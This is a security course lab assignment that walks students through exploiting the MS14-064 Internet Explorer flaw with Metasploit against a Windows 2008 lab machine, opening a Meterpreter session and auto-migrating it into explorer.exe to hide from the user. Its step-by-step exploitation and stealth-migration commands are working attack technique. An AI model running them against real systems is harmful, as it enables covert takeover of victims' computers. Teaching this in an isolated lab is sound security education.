Project 14: Attacking Internet Explorer and Migrating (10 pts.)

What You Need

Task 1: Using the MS14-064 Attack (5 pts.)

In a Web browser, go to:

http://www.rapid7.com/db/modules/exploit/windows/browser/ms14_064_ole_code_execution

Read about this attack. It's amazing--it uses a vulnerability that's been in Internet Explorer since IE 3 on Windows 95. The Metasploit module only claims to work on Windows XP and 7, but since it uses PowerShell, and PowerShell is included in Windows Server 2008, it works there too.

Testing Networking

Start both your Kali and Windows 2008 server machines. On your Kali machine, execute the ifconfig command to find your IP address.

On your Windows machine, ping the Kali machine. If you don't get replies, you need to troubleshoot your networking before proceeding.

Freeing Port 80

We plan to start a malicious server on port 80, so we need to make sure there's nothing already listening on that port.

On your Kali attacker, execute this command:

netstat -pant

If there's no process listening on port 80, you don't need to do anything. If port 80 is listening, you'll see what process is listening. In the image below, apache2 is listening on port 80.

If you need to stop apache, do that with this command:

service apache2 stop

You could also use the kill command to kill the process by its Process ID number.
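As an added example (not part of the original project), here is a small POSIX shell script that automates the port check above: it filters "netstat -pant" output for a listener on a given port and reports the PID/program so you know what to stop before starting the Metasploit server. The sample netstat output embedded below is constructed for offline testing; on a real Kali machine pipe the live output in as shown in the comments.

```shell
#!/bin/sh
# Added example, not from the original project.
# Real usage on Kali:  netstat -pant 2>/dev/null | port_listener 80
# Prints "PID/Program" (e.g. "1234/apache2"), or nothing if the port is free.
port_listener() {
    port="$1"
    # netstat -pant columns: Proto Recv-Q Send-Q Local Foreign State PID/Program
    # Keep LISTEN rows whose local address ends in ":<port>" (IPv4 "0.0.0.0:80" or IPv6 ":::80").
    awk -v p="$port" '$1 ~ /^tcp/ && $6 == "LISTEN" {
        n = split($4, a, ":")
        if (a[n] == p) print $7
    }'
}

# Returns 0 if the port is free, 1 (and a message on stderr) if something is listening.
port_is_free() {
    listener=$(port_listener "$1")
    if [ -n "$listener" ]; then
        echo "port $1 is in use by $listener; stop that process first" >&2
        return 1
    fi
    return 0
}

# Constructed sample of "netstat -pant" output (not real captured data).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      512/sshd
tcp6       0      0 :::80                   :::*                    LISTEN      1234/apache2
tcp        0      0 192.168.1.5:22          192.168.1.9:51502       ESTABLISHED 890/sshd'

# Demo against the constructed sample: port 80 is taken by apache2, port 443 is free.
if printf '%s\n' "$SAMPLE_NETSTAT" | port_is_free 80; then
    echo "port 80 is free"
fi
if printf '%s\n' "$SAMPLE_NETSTAT" | port_is_free 443; then
    echo "port 443 is free"
fi
```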

Starting a Malicious Web Server

On your Kali attacker, execute these commands:
msfconsole

use exploit/windows/browser/ms14_064_ole_code_execution

show options

As shown below, all the options have sensible defaults--none of them require adjustment. However, let's set the URIPATH and SRVPORT, just to make the typing easier, and to label the screenshot with your name.

On your Kali attacker, execute these commands, replacing "YOURNAME" with your own name, without spaces:

set SRVPORT 80

set URIPATH YOURNAME

exploit

Both the reverse handler and the Web server start, as shown below. Note the URL outlined in green in the image below.

Opening the Malicious Web Page on the Target

On your Windows 2008 target machine, open Internet Explorer and open the URL shown by Metasploit on your Kali machine, which contains your name.

If the page won't load, try refreshing it a couple times, or removing the :80 from the URL--that worked for me, as shown below.

When the page loads, an "Information Bar" pop-up box will appear, as shown below. In that box, click the Close button.

On your Kali machine, you should see a "Meterpreter session opened" message, as shown below.

To see the "meterpreter>" prompt, execute this command:

sessions -i 1

Saving the Screen Image

Make sure the "Meterpreter session opened" message is visible, as shown above.

Save a whole-desktop screen capture with a filename of "Proj 14a from YOUR NAME".

Task 2: Automatic Migration with a Script (5 pts.)

Learning About the Migrate Script

On your Kali attacker, at the "meterpreter>" prompt, execute this command:
run migrate

You see the basic functionality of the script, as shown below.

Closing Internet Explorer

Look at your Windows 2008 Server desktop. Internet Explorer is frozen, with a blank page. The user won't tolerate that for long--within a few seconds, the user will probably close Internet Explorer. For several common Metasploit modules, that breaks the meterpreter session.

On your Windows 2008 Server desktop, close Internet Explorer.

Understanding the Meterpreter Process

On your Kali server, at the "meterpreter>" prompt, press Enter.

The Meterpreter session is still working! To see why, at the "meterpreter>" prompt, execute this command:

getpid

You see the process ID of the process Metasploit is using on the target machine, as shown below. Your PID will be different from mine.

To see what this process is, on your Windows 2008 Server desktop, at the bottom of the screen, right-click the taskbar and click "Task Manager", as shown below.

In Task Manager, click View, "Select Columns...". In the Select Process Page Columns box, check "PID (Process Identifier)", as shown below.

Click OK.

In Task Manager, expand the width of the new column so you can see the PID header.

Click the PID header to sort by PID and find the PID you saw in meterpreter.

This particular exploit does not work by injecting code into the running iexplore.exe process. It starts a new "ApacheBench Command Line" process with a name composed of random letters, as shown below.

Closing the ApacheBench Process

In Task Manager, click the ApacheBench process to select it, as shown above. At the lower right, click the "End Process" button.

A box pops up asking "Do you want to end this process?" Click the "End process" button.

On your Kali machine, the meterpreter session dies, as shown below.

Killing the Malicious Web Server Job

We need to stop the currently running Web server so we can change the malware it hands out.

On your Kali attacker, press Enter to see a normal Metasploit prompt.

Execute this command:

jobs

You see one job running, with Id=0, as shown below.

To kill the job, execute this command:

kill 0

Automatic Migration

We want to automatically migrate the session to a normal process, so the user won't notice anything unusual in Task Manager.

On your Kali attacker, in Metasploit, execute this command:

show advanced

Scroll back up to the "Payload advanced options" section.

One of the options is "AutoRunScript", as shown below.

On your Kali attacker, in Metasploit, execute these commands:

set AutoRunScript migrate -n explorer.exe

exploit

On your Windows 2008 Server machine, open Internet Explorer. Open the URL specified by Metasploit, and close the "Information Bar" box.

A session opens, the migrate script runs, and the session automatically migrates to another process, as shown below.

Saving the Screen Image

Make sure the "processing AutoRunScript 'migrate -n explorer.exe'" message is visible, as shown above.

Save a whole-desktop screen capture with a filename of "Proj 14b from YOUR NAME".

Viewing the Process on the Target Machine

On the Windows 2008 Server machine, close Internet Explorer. At the bottom of the screen, right-click the taskbar and click "Task Manager".

In Task Manager, find the PID you saw in meterpreter. That process is "explorer.exe", as shown below.

This is a good process to use, because it won't be closed until the user logs off.

Turning In Your Project

Email the image to cnit.124@gmail.com with a subject of "Project 14 from YOUR NAME".


Posted 10-28-15 by Sam Bowne
sessions command added 4-21-19